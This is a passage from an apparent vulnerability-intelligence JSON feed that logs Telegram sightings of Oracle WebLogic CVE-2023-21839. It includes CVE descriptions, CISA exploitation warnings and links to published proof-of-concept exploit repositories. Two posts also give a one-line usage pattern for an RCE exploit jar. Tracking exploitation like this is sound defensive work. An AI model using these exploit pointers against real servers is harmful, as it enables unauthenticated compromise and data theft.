\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0430\u0442\u0430\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2024-06-28T19:48:04.000000Z"}, {"uuid": "60c644b9-bd3a-48fa-9c5f-23de1182a9f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/19048", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/lovingpot/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-15T12:38:06.000000Z"}, {"uuid": "82ac3180-2b33-4517-a8c4-f8a87e7b3758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/huwbgAbaMEWosXfyrmxxciyHWQADSO7pn6QM2fwvuRZxHT8", "content": "", "creation_timestamp": "2023-02-23T14:13:17.000000Z"}, {"uuid": "ca991a44-406a-41f5-93ca-ccd40200dcf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/aZv6MAkPy0Zg9M5eswpBgPGNLziNK_Z6couQG8utTPmkEhE", "content": "", "creation_timestamp": "2023-02-26T12:28:03.000000Z"}, {"uuid": "203504d1-250b-4500-ac02-b65267788a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/E2GnXuDb4RwZPSkCQd23ewMo-H7lFJl9luVffYlNtma6JKU", "content": "", "creation_timestamp": "2023-02-22T10:12:27.000000Z"}, {"uuid": "67128378-376d-4c34-beca-be47d1044c8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/rtIvSzND_cGJDjAmNbpFbRjMYLO0j4LkJOjAcfYVbCa7YVw", "content": "", "creation_timestamp": "2023-02-22T06:20:02.000000Z"}, {"uuid": "c1ef3b36-69df-4d54-bf31-5ee7b1d19ffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "Telegram/zv0-WN1ekGzYSPAJbDAdNFDyGxKQy119XVSjXkoYLwf1MgNb", "content": "", "creation_timestamp": "2024-06-06T19:08:56.000000Z"}, {"uuid": "22c3d342-024f-4d96-a33d-234af0961cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "Telegram/TWFAujDiM9Q_sDIuwdzuCj1B9CB6p4iXNPfDtcfRQau4qapO", "content": "", "creation_timestamp": "2024-06-13T14:24:39.000000Z"}, {"uuid": "bc7bcc06-8df6-4dfa-9d47-33300cf3d3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/1120", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956630000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-04T05:09:32.000000Z"}, {"uuid": "6ce53fc4-1618-4377-967a-1cf2d55cf3c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/1819", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956770000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-16T12:36:22.000000Z"}, {"uuid": "b1f46a38-244f-4695-98fb-6a2d64c78451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "Telegram/df00WYSUjit1DWXpvNXHqs49rHh6V5cBerM4bfCs3-Ie", "content": "", "creation_timestamp": "2024-06-13T22:47:27.000000Z"}, {"uuid": "5108f53e-3a95-41bd-9a7e-e7624cb074f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/vxR48xjEP6WBdCVXNbCTjoVsMUt2b0RWUkGzAhfJjXTHV4Q", "content": "", "creation_timestamp": "2025-03-21T16:00:10.000000Z"}, {"uuid": "3cb34bbe-896f-4aa3-b540-4cf6c8fd9414", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/1666", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956630000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-10T17:39:47.000000Z"}, {"uuid": "bdc250e3-2f03-431d-a25a-3a65d4ee5fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/Oxq5SO8-21GQipP6NIDCbdDkAA225btYdW6eEU8zypkEJg0", "content": "", "creation_timestamp": "2025-03-15T22:00:06.000000Z"}, {"uuid": "7d3891d0-d205-4318-b711-3f2cb7f43955", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/arpsyndicate/547", "content": "#ExploitObserverAlert\n\nCVE-2023-21839\n\nDESCRIPTION: Exploit Observer has 57 entries related to CVE-2023-21839. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).  Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and  14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\nFIRST-EPSS: 0.956630000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-11-24T22:48:52.000000Z"}, {"uuid": "e5df8710-ec83-4853-ab9a-33396f7619dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/ZlaxNukjypT5vOtDz8wMSCFTorbGWtJCsvTUlszpJkI7kUA", "content": "", "creation_timestamp": "2025-03-05T16:00:09.000000Z"}, {"uuid": "88f72761-927f-42d1-9e30-280ea99d022d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/zSzoebszbbIXMk27Rqts2RR5nycMptSURZnSEC0hbBVOUIQ", "content": "", "creation_timestamp": "2025-03-03T22:00:06.000000Z"}, {"uuid": "417407c6-719a-4e22-9910-a22dd07ac8f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/qOGRN02zxh7X-pALZbUajuSx7WC-BrFnsJBUinVh29xifwg", "content": "", "creation_timestamp": "2025-02-24T16:00:08.000000Z"}, {"uuid": "e626fc89-3db0-4f70-9489-f2b81e70543d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/breachdetector/325905", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-21839 Oracle WebLogic Nedir ?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"29 Aug 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-08-29T10:43:00.000000Z"}, {"uuid": "d3c17322-d122-462e-90ff-9eae5215c852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2337", "content": "#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\n\u200b\u200bCTI Fundamentals\n\nA collection of papers, blogs, and resources that make up the quintessential aspects of cyber threat intelligence.\n\nhttps://github.com/curated-intel/CTI-fundamentals\n\n\u200b\u200bprotocurl\n\nprotoCURL is cURL for Protobuf: The command-line tool for interacting with Protobuf over HTTP REST endpoints using human-readable text formats\n\nhttps://github.com/qaware/protocurl\n\n\u200b\u200bmast1c0re\n\nDevelop payloads that can be executed on the PlayStation 4 or PlayStation 5 through a game save file.\n\nhttps://github.com/McCaulay/mast1c0re\n\n\u200b\u200bSerianalyzer\n\nSerianalyzer is a static bytecode analyzer tracing native method calls made by methods called during deserialization.\n\nThe main purpose of this tool is as a research tool to audit code for dangerous behavior during deserialization. It is not really useful to determine whether you application is vulnerable or not. If your application deserializes data crossing trust boundaries - you should assume it is.\n\nhttps://github.com/mbechler/serianalyzer\n\n\u200b\u200bAwesome Vulnerable Applications\n\nA curated list of various vulnerable by design applications\n\nhttps://github.com/vavkamil/awesome-vulnerable-apps\n\n\u200b\u200bTheThing\n\nOpen-source tool to detect DOM Clobbering vulnerabilities.\n\nhttps://github.com/SoheilKhodayari/TheThing\n\nDOM Clobbering? \u2192 https://domclob.xyz/\n\n#cybersecurity #infosec\n\n\u200b\u200bMineMe\n\nMineMe is a node tool that gathers information about a Minecraft account by scraping multiple websites. It should be really easy to make your own modules, so don't hesitate to fork and bring your own things.\n\nhttps://github.com/Nenaff/MineMe\n\n#minecraft #OSINT\n\n\u200b\u200bWifi-Hacking\n\nCyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES)\n\nhttps://github.com/ankit0183/Wifi-Hacking\n\n\u200b\u200bVDP-Finder\n\nThis extension tells if visited sites have vulnerability disclosure programs\n\nhttps://github.com/yeswehack/yeswehack_vdp_finder\n\n\u200b\u200boss-vulnerability-guide\n\nA guide on coordinated vulnerability disclosure for open source projects. Includes templates for security policies (security.md) and disclosure notifications.\n\nhttps://github.com/ossf/oss-vulnerability-guide\n\n\u200b\u200bSentinelPS\n\nAzure Sentinel-related PowerShell scripts\n\nhttps://github.com/rod-trent/SentinelPS\n\n\u200b\u200bWeblogic CVE-2023-21839\n\nhttps://github.com/Scarehehe/Weblogic-CVE-2023-21839\n\n#cve #poc\n\n\u200b\u200bIntelMQ \n\nIntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol.\n\nhttps://github.com/certtools/intelmq\n\nBTC:\nbc1q62lwma4r3w3klq4mcn5hys9nps5h40qmafrc8e\n\n#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\nwww.ghostclan.org", "creation_timestamp": "2024-02-08T19:39:36.000000Z"}, {"uuid": "52cd36d9-b9aa-499e-9341-598e90020bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1396", "content": "Weblogic-CVE-2023-21839\n*\nAffected version\n12.2.1.3.0\n12.2.1.4.0\n14.1.1.0.0\n\nPOC\n\nUsage POC:\njava -jar target ip: \u0430\u0434\u0440\u0435\u0441 \u043f\u043e\u0440\u0442\u0430 ldap", "creation_timestamp": "2023-02-22T08:16:14.000000Z"}, {"uuid": "6619acd4-e84d-449d-b14b-2fb86953a674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://t.me/YE_0x/770", "content": "\u0623\u0636\u0627\u0641\u062a \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0623\u0645\u0646 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a\u0629 (CISA) \u062b\u0644\u0627\u062b\u0629 \u0639\u064a\u0648\u0628 \u0625\u0644\u0649 \u0643\u062a\u0627\u0644\u0648\u062c \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u063a\u0644\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 (KEV) \u060c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u062f\u0644\u064a\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0646\u0634\u0637.\n\nCVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability\nCVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability\n\n\ud83d\udea8 ===============\n\ud83d\udd30 #0xYE\n\ud83d\udd30 #Cyber_Security\n\ud83d\udd30 #Yemeni_Hackers \n\ud83d\udd30 @YE_0x\n\ud83d\udea8===============", "creation_timestamp": "2023-07-06T16:19:06.000000Z"}, {"uuid": "69346d6c-5518-4df1-aea6-78485fa3ff8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2611", "content": "#CVE-2023\nPOC and Scanner for CVE-2023-24055\nhttps://github.com/deetl/CVE-2023-24055\n\n\nCVE-2023-21839 exp\n\nhttps://github.com/fakenews2025/CVE-2023-21839\n\nCVE-2023-23132\n\nhttps://github.com/l00neyhacker/CVE-2023-23132\n\n@BlueRedTeam", "creation_timestamp": "2023-03-05T09:27:29.000000Z"}, {"uuid": "4e1a6ba2-2cab-4778-8737-97714158c488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://t.me/information_security_channel/49839", "content": "CISA Warns of Attacks Exploiting Oracle WebLogic Vulnerability Patched in January\nhttps://www.securityweek.com/cisa-warns-of-attacks-exploiting-oracle-weblogic-vulnerability-patched-in-january/\n\nCISA warns of attacks exploiting an Oracle WebLogic vulnerability tracked as CVE-2023-21839, which was patched with the January 2023 CPU.\nThe post CISA Warns of Attacks Exploiting Oracle WebLogic Vulnerability Patched in January (https://www.securityweek.com/cisa-warns-of-attacks-exploiting-oracle-weblogic-vulnerability-patched-in-january/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2023-05-02T13:24:04.000000Z"}, {"uuid": "27da6a9d-2e81-4034-b042-e2f2197caa69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/-PMYKqFNcLaJdOUBsk5-oyra9fd6nCwZMBxV9rVe8rsei-E", "content": "", "creation_timestamp": "2024-03-22T15:42:38.000000Z"}, {"uuid": "28b1f678-ff79-4bf3-a8a8-ba4594a4e821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/ZWO6bVGmvRomAIGB1Gy9nQK9S9lVg_M5eyQCvJuH67nXwuk", "content": "", "creation_timestamp": "2023-04-14T05:35:06.000000Z"}, {"uuid": "1642e101-f85d-4082-9339-247380d2eef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/cFE2uDJKQiKElmO3_7KlSaQHLf9u2iA0iIuDt9gRXSoyrPs", "content": "", "creation_timestamp": "2023-03-14T04:09:39.000000Z"}, {"uuid": "fe408486-380e-44d7-bd67-2de97fc88d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/4133", "content": "\u041a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c 4ra1n \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b PoC\u00a0\u0434\u043b\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2023-21839, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Oracle WebLogic \u0438 \u0438\u043c\u0435\u044e\u0449\u0435\u0439 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 7,5.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0435 Oracle WebLogic Server \u0434\u043b\u044f Oracle Fusion Middleware \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u044f\u0434\u0440\u0430 \u0438 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u0438 12.2.1.3.0, 12.2.1.4.0 \u0438 14.1.1.0.0.\n\n\u041b\u0435\u0433\u043a\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u043c\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 T3, IIOP, \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c Oracle WebLogic Server.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u0443 \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u043b\u0438 \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u0443 \u043a\u043e \u0432\u0441\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c Oracle WebLogic Server.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 Oracle 24 \u044f\u043d\u0432\u0430\u0440\u044f \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0437\u0430\u0431\u043e\u0442\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u043a\u0443\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0440\u0438\u0441\u043a\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2023-03-06T11:23:41.000000Z"}, {"uuid": "396e8db1-fa6c-45e5-a7e1-435d0a019117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21833", "type": "seen", "source": "https://t.me/ctinow/182528", "content": "https://ift.tt/9WFPC15\nCVE-2023-21833 | Oracle ZFS Storage Appliance Kit 8.8 Object Store information disclosure", "creation_timestamp": "2024-02-10T11:06:52.000000Z"}, {"uuid": "449dbd22-b51a-4908-93b0-7ec3d4bc3af4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21833", "type": "seen", "source": "https://t.me/ctinow/186740", "content": "https://ift.tt/WdJaVqw\nCVE-2023-21833", "creation_timestamp": "2024-02-17T03:26:34.000000Z"}, {"uuid": "1662922a-c21b-4f05-9680-c94dd2676580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://t.me/thehackernews/3303", "content": "Heads up, everyone! \n \nCISA has issued an advisory warning of active exploitation of three known vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX-21), CVE-2021-45046 (Apache Log4j2) and CVE-2023-21839 (Oracle WebLogic). \n \nDetails: https://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html", "creation_timestamp": "2023-05-02T07:47:51.000000Z"}, {"uuid": "b3a50510-435a-4a6f-9468-9c2a3746d73c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/460", "content": "https://github.com/Scarehehe/Weblogic-CVE-2023-21839\n#github", "creation_timestamp": "2023-02-22T11:32:01.000000Z"}, {"uuid": "50380bd0-0c85-46a4-acb0-22b3c7ab4c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4713", "content": "Weblogic-CVE-2023-21839\n\n\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 :\n\n12.2.1.3.0\n\n12.2.1.4.0\n\n14.1.1.0.0\n\nGithub\n\nUsage : \n\njava -jar target ip: port ldap address\n\n#CVE \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:26:05.000000Z"}, {"uuid": "a8b8b437-4357-4800-834b-1b68c621d0f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7807", "content": "#exploit\n1. CVE-2022-41042:\nHTML/JavaScript injection in MS SARIF viewer/MS Live Preview extension, Path traversal in the local HTTP server in MS Live Preview extension\nhttps://blog.trailofbits.com/2023/02/21/vscode-extension-escape-vulnerability\n\n2. CVE-2023-21839:\nVulnerability in the Oracle WebLogic Server\nhttps://github.com/Scarehehe/Weblogic-CVE-2023-21839", "creation_timestamp": "2023-02-23T11:23:01.000000Z"}, {"uuid": "bbc3fc63-0f67-40f0-a067-efad5903a04b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4765", "content": "Weblogic CVE-2023-21839 RCE\n\nGithub\n\n#CVE #RCE\n\u2014\u2014\u2014\u2014\u2014\u2014\u2067\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:26:07.000000Z"}]}